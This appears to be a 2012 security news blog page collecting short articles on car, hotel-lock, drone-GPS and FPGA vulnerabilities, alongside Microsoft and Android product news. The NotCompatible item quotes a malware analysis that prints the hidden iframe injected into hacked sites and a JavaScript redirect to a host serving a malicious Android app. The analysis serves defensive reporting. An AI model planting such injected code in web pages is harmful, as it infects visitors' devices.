Researchers Said Cars Equipped With Computers are Vulnerable to Hacking, Intel Investigating

Researchers Said Cars Equipped With Computers are Vulnerable to Hacking, Intel Investigating

Security researchers have unveiled that cars equipped with electronic communications systems and computers are vulnerable to hacking and viruses, which could translate to crashes while on the road. According to a report of Reuters a special team employed by Intel is looking into software and hardware vulnerabilities in modern cars that could allow access to hackers to take control of vehicles. Barnaby Jack, a director of research at security consulting firm IOActive Labs, who became famous when he announced that he could make an ATM machine dispense money to anyone and to cause medical equipment to pump lethal doses of insulin to patients, is one of the members of the group.
Another research group demonstrated a simple method of infecting a car with a malware by using nothing but a CD. When the victim plays the CD,  the malware is activated and jumped from the CD to the computer system of the car. While infecting the car radio is not life threatening at all, the code executed after running the CD can gain access to other important systems of the car itself. Researchers also said that car viruses can be utilized for more subtle use. One example they mentioned was to use it to remotely listen on conversations inside the car. It’s like a Hollywood-style trick but could come in handy for use for government spying or corporate espionage. Modern automobiles are already considered “computers on wheels” by security experts and it’s only a matter of time before their vulnerabilities will be exploited widely. Today’s cars are filled with small computers known as electronic control units or ECUs that needs a very sophisticated set of codes to manage interconnected systems like brakes, engines, navigation, entertainment, and lighting. They are also employing technologies common to mobile devices such as Bluetooth headsets and cell phones, making them vulnerable to remote attacks widely known among black hats or criminal hackers.
Security experts fear that terrorists, criminals, and spies will turn their attention to embedded computers, which can be attacked using similar techniques as common computers. One particular issue for concern arises and that is how to fight the transfer of PC viruses that could affect the computers in a car when laptops and other devices are plugged into entertainment systems of cars??

Black Hat 2012- Key-Card of Hotel Door Can Be Bypassed With An Open-Source Tool "Arduino"

Black Hat 2012- Key-Card of Hotel Door Can Be Bypassed With An Open-Source Tool "Arduino"

For millions of travelers the ubiquitous hotel key card is the primary and essentially the only way to access their rooms at the end of day. But when you will heard that the key card, you use to access your private room is no longer safe then its very much possible that you will shock. And trust me this happened in Black Hat 2012. A security researcher, Cody Brocious believes the current systems used to secure hotel doors throughout the United States and elsewhere are severely flawed. Speaking at the Black Hat security conference here, Brocious demonstrated how locks from Onity a company that sells security products to hotels and other businesses can easily be bypassed. At the show, Brocious detailed the primary security flaws that allowed him to bypass Onity locks and gain access to rooms.
According to eWEEk -Brocious used an open-source tool known as Arduino, a portable programming platform. Arduino was used as a substitute for the commercial portable programmer that an Onity lock would typically require. Brocious explained that the Onity locks have a serial hardware connection that is easily accessible, as well. In addition to the Arduino tool, Brocious used an oscilloscope that allowed him to see what was happening in the lock whenever a key card was put in and the door opened or closed. He was able to determine through his research that the underlying firmware on the lock does not require any form of authentication to arbitrarily access the memory of the lock. This means it is possible to read out every bit of information that is on the lock, which makes it possible for anyone to gain access or make a key.
In theory, programming for the lock should go over a secure channel, rather than doing direct unencrypted memory access, said Brocious. The problem, according to his research, is that the existing Onity lock design does not easily allow for that, and there is no easy way to update the firmware. Another potential option is to actually provide physical security on the door lock. For example, the company could make the serial port harder to access. However, with 5 million of these locks in use today, Brocious said this would be an expensive and challenging way to add additional security. The actual door locks are only half the problem exposed by Brocious. The card keys are also at risk. Typical card keys in the Onity system use only 32-bit key encryption making them easy to decrypt, according to Brocious. "The system is broken at every layer," said Brocious.
The severity of the issue and its high impact is what led Brocious to choose to release his research at Black Hat. In addition to his research, he is also releasing a software tool so that others can continue or expand on his efforts. "Something needs to be done about this problem, and I didn't want to put it out there in a way that could be defeated by process," said Brocious. "No doubt, this vulnerability has been found before, and it has been in the locks for years."
Brocious added: “I'd be surprised if this hasn't been used by malicious actors in the past.” What Brocious is hoping to achieve from this disclosure is not a mass string of hackers getting unauthorized access to hotel rooms, but rather some kind of fix and industry response. "I'm saying that this is what you're vulnerable [to], so come up with a way to solve the problem," said Brocious.

Microsoft's Windows 8 Will Be Available On October 26

The final countdown of Windows 8 begins as software giant Microsoft announced that they will start selling Windows 8 from coming October 26, a little more than three months from now. This release will be first stable one of Windows 8, earlier we got three pre-release version of Windows 8 -Consumer Preview, Developer Preview & Release Preview. Windows 8 is Designed to work on both PCs and tablet computers, So far Windows 8 is Microsoft's best hope for competing with devices. According to official blog of Windows Steam - "Steven Sinofsky announced at Microsoft’s annual sales meeting that customers will be able to get Windows 8 – whether in upgrade fashion or on a new PC – starting on October 26thEarlier this month at the Microsoft Worldwide Partner Conference, Tami Reller told attendees Windows 8 would be available in October. But now everyone has a specific date to mark on their calendars."
The Oct. 26 date is also significant to users now running Windows XP, Vista or Windows 7, as it marks the debut of the $39.99 upgrade to Windows 8. The price is a dramatic discount from other Windows upgrade. All users who upgrade will receive Windows 8 Pro, the more advanced of the two retail editions. Microsoft has also tied the launch of its Windows RT operating system, and its first-ever tablet, dubbed "Surface" to the debut of Windows 8. It does have some wiggle room, however, for the tablet, because it has said that the device would go on sale around the time of Windows 8's release. Microsoft officials have not said how much the promised System Builder SKU will be for those who want to build their own PCs. They also have not said whether a full, non-upgrade version will be available via retail and how much it will cost.

Illicit Networks Summit Decided -Google Will Tackle Internet Crime

Illicit Networks Summit Decided -Google Will Tackle Internet Crime
Bad news for those who relies on GHDB also widely known as Google Hacking Database while finding vulnerability. This Tuesday the internet giant Google has launched a new policy  to turn the tables on criminals and terrorists who exploit the internet by using its search capabilities to expose and disrupt illicit activity.  A two-day summit in Los Angeles called Illicit Networks: Forces in Opposition has assembled victims, law enforcers, politicians, academics and technology experts to devise strategies. In their report Guardian says- Google Ideas, the company's thinktank, has teamed up with the Council on Foreign Relations, Interpol and other organizations to look for ways to use technology against organized crime, jihadists and others."Google is in a great position to take these on," Rani Hong, a survivor of child trafficking in India who is now a special adviser to the United Nations, told reporters on the eve of the event. "They're a powerful medium and they have great tools to solve this problem."
Stewart Patrick, a senior fellow at the Council on Foreign Relations who helped organise the event, told "It might sound like a different path for Google, but technology companies today have a lot of powerful tools for bringing transparency to these illicit networks, to fight back against corruption and empower those who are trying to combat transnational crime."
Participants will discuss how illicit surgeons and organ brokers smuggle kidneys and other organs; how whistleblowers can expose narcotics networks; how insurance fraudsters and counterfeiters use evade borders. Another topic will be how recovered human skin and bone is transformed into dental and cosmetic products for plumping up lips or smoothing wrinkles.

Security Hole in Amazon's Kindle Touch Allowing Attacker to Execute Arbitrary Shell Commands As root

Security Hole in Amazon's Kindle Touch Allowing Attacker to Execute Arbitrary Shell Commands as root
Yet again another major security hole found in Amazon's Kindle Touch which could lead a attacker to run malicious codes and even can get root privilege. This hole has been found into the built in browser of Kindle Touch. The vulnerability is something follows - when a user navigates to a specially crafted web page, the Kindle will execute arbitrary shell commands as root. This allows attackers to access the eBook reader's underlying Linux system at the highest privilege level and potentially steal the access credentials for the Amazon account linked to the Kindle, or purchase books with the Kindle user's account.
Though Amazon have a solid excuse while saying  the Kindle browser has been considered to be in "beta" for more than a year, this status doesn't reduce the risk for inquisitive users as the software is installed on each device by default.
We would like to give you reminder that, this security issue was publicly documented about three months ago but hasn't attracted much attention – except in the jailbreak community. The issue doesn't appear to affect any other Kindle models. Amazon's security department told heise Security that they are working on a patch.

Zero-Day Vulnerability Found in The Server Monitoring Software of HP

Zero-Day Vulnerability Found in The Server Monitoring Software of HP

After the massacre of HP LaserJet Printers yet again another product of HP (server monitoring software) has been infected with zero-day vulnerability. Hewlett-Packard have already issued a security warning to its customers about two security vulnerabilities in its Operations Agent server monitoring software. The vulnerabilities were reported to HP by Luigi Auriemma via TippingPoint's Zero Day Initiative (ZDI). According to the company, unspecified errors in the enterprise software for AIX, HP-UX, Linux, Solaris and Windows can be exploited by a remote attacker to compromise a vulnerable system and execute arbitrary code. Both of these errors have a CVSS 2.0 (Common Vulnerability Scoring System) base score of 10.0, the highest.
Versions prior to 11.03.12 on all supported platforms are affected; upgrading to 11.03.12 corrects the problems. A full list of affected versions, and patch download information can be found in the company's security advisory. HP advises all administrators to install the patches as soon as possible.

DHS Outlines $202 Million To Continuously Monitor Their Computers & Networks For Security Threats

DHS Outlines $202 Million To Continuously Monitor Their Computers & Networks For Security Threats

People like you, me or us those who are directly involved or associated in this security domain knows very well that cyber crime is in a saturated situation. Since last 3-4 years hackers have broken almost 99%, It's already became an International issue. Every day the said security system is getting compromised. To fight against this burning issue the Department of Homeland Security has outlined another program costs more than $202 million to arm federal agencies with new tools to continuously monitor their computer networks for security threats. Contracts for monitoring services will be awarded as early as next year. The tools will enable agencies to monitor their systems every 24 to 72 hours, and to diagnose and prioritize the biggest security weaknesses. Such programs are already in operation at two agencies, the State and Justice departments.
When it comes to continuous monitoring capabilities, “we are a little bit uneven across [the] dot-gov” domain, said John Streufert, director of DHS’ National Cybersecurity Division.
The tools will help agencies be aware of all hardware and software that has access to their networks and ensure they meet security standards. They also will continuously scan their networks for vulnerabilities so they can be quickly addressed when they appear. The tools will include dashboards that present to IT officials snapshots of their networks’ security status to enable quick response in the event a vulnerability. Agencies will have the option of providing their own monitoring using DHS-provided tools; purchasing a monitoring service from another agency or contractor; or obtaining a monitoring service for cloud-based systems from their cloud service providers.

Drone Fleets Are Vulnerable to GPS Spoofing & Can Be Hijacked By Terrorist

Drone Fleets Are Vulnerable to GPS Spoofing & Can Be Hijacked By Terrorist

Spying drones have always gone through with several controversies along with a lots of technical & security issues. Yet again a team at the University of Texas has managed to find a vulnerability in drones that allows an attacker to gain control of the unmanned vehicle and change its course. Professor Todd Humphreys and the team spoof GPS receivers in order to take control of the drones
According to an exclusive report of Fox News - A small surveillance drone flies over an Austin stadium, diligently following a series of GPS waypoints that have been programmed into its flight computer. By all appearances, the mission is routine. Suddenly, the drone veers dramatically off course, careering eastward from its intended flight path. A few moments later, it is clear something is seriously wrong as the drone makes a hard right turn, streaking toward the south. Then, as if some phantom has given the drone a self-destruct order, it hurtles toward the ground. Just a few feet from certain catastrophe, a safety pilot with a radio control saves the drone from crashing into the field.

Last year we came to know that a stealthy key-logger has hit the U.S. Drone logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other war zones. Later Iran took responsibility of that cyber attack. But spoofers are a new problem for GPS-guided drones, allowing hackers to trick navigation systems with false information. Humphreys and the team have designed a device costing less than $1,000 that sends out a GPS signal stronger than the ones coming down from orbiting satellites. At first, the rogue signal mimics the official one in order to trick the drone, and once it’s accepted new commands can be sent to the UAV. US government says its aware of the potential dangers of spoofing, and officials from the FAA and Department of Homeland Security have seen Humphreys’ demonstration first hand. The Department of Homeland Security reportedly has a program in place to try and solve the problem of GPS interference, but it’s aimed at trying to deal with jammed signals, not spoofed ones.

CyanogenMod 9.0-RC1 Based on Android 4.0 "Ice Cream Sandwich"

CyanogenMod 9.0-RC1 Released Based on Android 4.0 "Ice Cream Sandwich"

CyanogenMod team has released the first release candidate of CyanogenMod 9 based on Android 4.0. Six months ago Google published the source code of its Android 4.0, code-named "Ice Cream Sandwich" (ICS), and this first release candidate of CyanogenMod 9.0 is based on that code.  According to the release note "The jump from 2.3.7 to 4.0.4 in many ways was a fresh start for this project, and as much as the code changed, the structure and organization of CM as a whole changed as well. It meant a lot of hard work, and late nights, but also a ton of fun. We are in this for the challenge, and the reward is always the satisfaction received when we release it to the masses as a ‘stable’ product. This RC1 brings us a step forward toward that payoff ..."
This release comes just as Google is expected to launch the next version of Android, code-named "Jelly Bean", at its Google I/O conference. CyanogenMod RC1 is available for 37 devices and support for several more devices is expected to be added with future release candidates.  This is the first version of the ROM which does not include root access by default. This change fixes potential security problems while at the same time being unnoticeable to most users. For users who need root access this feature can be enabled from within the system settings to allow for USB debugging and applications that need root access.
Interested developers can download a version of the release candidate for their specific device from the redesigned get.cm web site or through the ROM Manager application on their phone or tablet.

Microsoft Unveils Windows Phone 8 Codenamed “Apollo”

Microsoft Unveils Windows Phone 8 Codenamed “Apollo”

Few days ago in a report we have said that Microsoft is expected to launch it's own tablet (Microsoft Surface) while aiming to compete with iPad. Redmond based software and hardware giant just unveiled the next big step in its mobile software, Windows Phone 8 codenamed “Apollo” Windows Phone 8 brings the platform in line with other mobile OSes by adding support for muti-core processors, higher screen resolutions and newer wireless technologies like near field communication (NFC). Importantly, Microsoft has re-coded Windows Phone from the ground up for the new version. Previous versions of Windows Phone were based on Microsoft’s old mobile OS, Windows CE, but now the platform will share the same source code as the company’s coming desktop OS, Windows 8. That has big consequences for developers and consumers. For developers, it will be extremely easy to create a Windows Phone app if they already have a Windows 8 app that runs in the Metro environment (and vice versa). For consumers, it means more apps and better hardware to run them. It also has the effect of rendering every current Windows Phone obsolete, since those phones won’t be able to run the new software. They will, however, get an upgrade to Windows Phone 7 to 8. Windows Phone 8 adds support for many new hardware features. The most anticipated is support for multi-core devices, which have become common on both Android and iOS platforms. There’s also support for better screen resolutions, including 720p and 1,280 x 768 (WXGA). That’s not quite retina, but it’s better than the 800 x 480 screen of the Nokia Lumia 900, one of the current leading Windows Phones.

New Features At a Glance :-
  • Support for multi-core processors. Existing support for single core has been a major concern for some high-end users wanting faster processing ability.
  • Two new high-definition screen resolutions for the coming OS. They are 1280 x 768 and 1280 x 720.
  • Removeable micro-SD support for the first time to allow expansion of base storage.
  • A busier start screen with room for more live tiles than in Windows Phone 7.5. Today's Windows Phones have room for up to eight live tiles and WP8 will have room for up to 32 live tiles, which can be sized differently.
  • IT support. Adminstrators will see some gaps in the existing OS filled, including support for encryption and secure boot in WP8, as well as the ability to allow IT to deploy apps without going through Windows Marketplace.
  • Built-in Nokia Navteq map technology, with turn-by-turn driving instructions in many countries.
  • Full Internet Explorer 10 support with more features of HTML 5 added. Belfiore said that Windows Phone 8 with IE10 will download Web pages slightly faster than three other popular smartphones on the market.
  • Native code support, a feature seen as useful to developers eager to move their apps from iOS or Android to Windows Phone.

Microsoft is Expected Launch Tablet To Compete With iPad

Microsoft is Expected Launch Tablet To Compete With iPad

A Speculation is building that Microsoft is expected to introduce a tablet computer of its own design that runs a new version of its Windows operating system in an effort to compete with Apple's iPad. It is the first time in the company’s 37-year history that it will offer a computer of its own creation.
This would be a dramatic break from Microsoft's usual moves in computer hardware, where it develops the software and licenses that to hardware makers to ensure the broadest possible market. But Microsoft has fallen behind Apple and Google in the fast growing tablet market – already one-eighth as large as the PC market and forecast to be 40% by 2016. The fastest growth in tablet sales is in western countries, where PC sales are slowing, reducing sales in the Windows division in four of the past six quarters. Windows 8, to be released this year, is designed to be used on a tablet as well as a desktop PC.
Microsoft has invited the media to an event in Los Angeles Monday afternoon, where it is expected to show its tablet device. The entertainment industry Web site The Wrap earlier reported that Microsoft planned to announce a tablet at the event.
For Microsoft, making a tablet is a risky venture. Even with the emerging competition from the iPad, Windows remains one of the greatest franchises the technology industry has known, accounting for $4.6 billion in sales during the most recently reported quarter. Those sales are rooted in Microsoft’s alliance with its hardware partners. The plans could erode the commitment those partners have to Windows since Microsoft will effectively be competing with them for sales.

Internet Explorer 10 Will Support Do Not Track (DNT) By Default in Windows 8

Internet Explorer 10 Will Support Do Not Track (DNT) By Default in Windows 8

Browser war continues and as a result here come another twist, that is in its recent Windows 8, I mean on Release Preview software giant Microsoft has announced that Internet Explorer 10 will have “Do Not Track” (DNT) on by default. IE 10 will be the first web browser with a Do Not Track feature that's on by default. In their official blog release MS said Consumers can change this setting, but the default will be to send the DNT signal to websites that consumers visit.
According to Microsoft's Chief Privacy Officer Brendon Lynch - "We've made today’s decision because we believe in putting people first. We believe that consumers should have more control over how information about their online behavior is tracked, shared and used. Consumers should be empowered to make an informed choice and, for these reasons, we believe that for IE10 in Windows 8, a privacy-by-default state for online behavioral advertising is the right approach..." Later he added "We are engaged with the W3C, as we are with many international standards bodies. While we respect the W3C's perspective, we believe that a standard should support a privacy by default choice for consumers"
The company also pointed to minutes from the W3C group working on the draft specs, in which the group's co-chairwoman said: "It will be quite a while before we have a final recommendation with which to comply or not.
"Do Not Track" is a tool that allows browser users to restrict advertisers from collecting information about their online Web activities. It has the backing of the U.S. Federal Trade Commission. Browsers with "Do Not Track" turned on don't block cookies but send a message to advertisers that the user does not want to be tracked. Companies voluntarily decide whether to comply with "Do Not Track," much as they currently decide whether to comply with the "Do Not Call" registry. Microsoft's announcement that it would turn on "Do Not Track" by default in IE10 angered advertisers. "The Digital Advertising Alliance, a coalition that counts Microsoft as a member, said that the decision ran counter to the industry's agreement with the White House announced earlier this year to honor 'do not track' as long as it is not a default setting," many international standards bodies.

Researchers Found Backdoor in FPGA Chip Used By US Military

Researchers Found Backdoor in FPGA Chip Used By US Military

A researchers team from Cambridge University has figure out that a Chinese-manufactured chip used by US armed forces contains a secret access point that could leave it vulnerable to third party tampering. But the backdoor in the FPGA chip is real, probably part of the manufacturer's debugging hardware, and is unlikely to be easily disabled. The researchers tested an unspecified US military chip — used in weapons, nuclear power plants to public transport – and found that a previously unknown ‘backdoor’ access point had been added, making systems and hardware open to attack, the team says. According to Sergei Skorobogatov, researcher of Cambridge University - "We scanned the silicon chip in an affordable time and found a previously unknown backdoor inserted by the manufacturer. This backdoor has a key, which we were able to extract. If you use this key you can disable the chip or reprogram it at will, even if locked by the user with their own key. This particular chip is prevalent in many systems from weapons, nuclear power plants to public transport. In other words, this backdoor access could be turned into an advanced Stuxnet weapon to attack potentially millions of systems. The scale and range of possible attacks has huge implications for National Security and public infrastructure."
The news comes at a time when Chinese cyber-spying threats are a particular concern. Chinese telecom manufacturers ZTE and Huawei are already under investigation from the US government, which is assessing whether the duo’s telecom businesses pose a national security threat. The Cambridge researchers did not name the company that developed the chip tested, nor did they provide more specific details of its usage. The draft of the associated paper gave more details though. Firstly, the chip in question was a Actel/Microsemi ProASIC3 chip, a "military grade" FPGA (Field Programmable Gate Array) which has a 128-bit AES encryption key to protect its contents and configuration, the intellectual property (IP) of the chip programmer. The chip is not an "American military chip" but an off-the-shelf component used in a wide variety of applications, including US military applications, and its encryption capabilities are specifically designed to only protect the IP.

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in a iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security official blog post-
How it Works :-
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details :-
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. "CloudOpen" Open-source Cloud Conference Will Be Hosted By Linux Foundation on August

"CloudOpen" Open-source Cloud Conference Will Be Hosted By Linux Foundation on August
The Linux Foundation announced that it would hold a symposium on the cloud, big data and open source this August in San Diego dubbed CloudOpen. Topics like Hadoop, Gluster, Chef and KVM -- in addition to Linux -- are to be on the menu, as the event aims to inform developers and IT operations personnel alike.
Amanda McPherson, vice president of marketing and developer services for the Linux Foundation, said that the free exchange of ideas is a crucial concern for the community.
"This conference is built on one belief: open works. We know this from experience and know that the cloud demands it in order to be successful for the long term. Because Linux, open-source software and collaborative development are the foundations of the cloud, it's important to provide a vendor-neutral forum where those who are committed to openness can advance this work and users and industry can learn about 'open' as it is related to the cloud," she stated.
The foundation also released a call for proposals, asking that submissions be made by June 1. While there were a couple of seemingly high-profile absences from the announcement -- both Canonical and VMware are nowhere to be found on the official statement -- Linux Foundation communications director Jennifer Cloer says the organization is in talks with both companies and that both are expected to participate in CloudOpen.
The announcement comes at a crucial time for VMware and Canonical, as the latter firm is planning to make waves of its own with the official release of Ubuntu 12.04 later this week and the former battles an increasingly clouded public perception in the open-source sector. The foundation has confirmed that Canonical will be a founding sponsor of CloudOpen
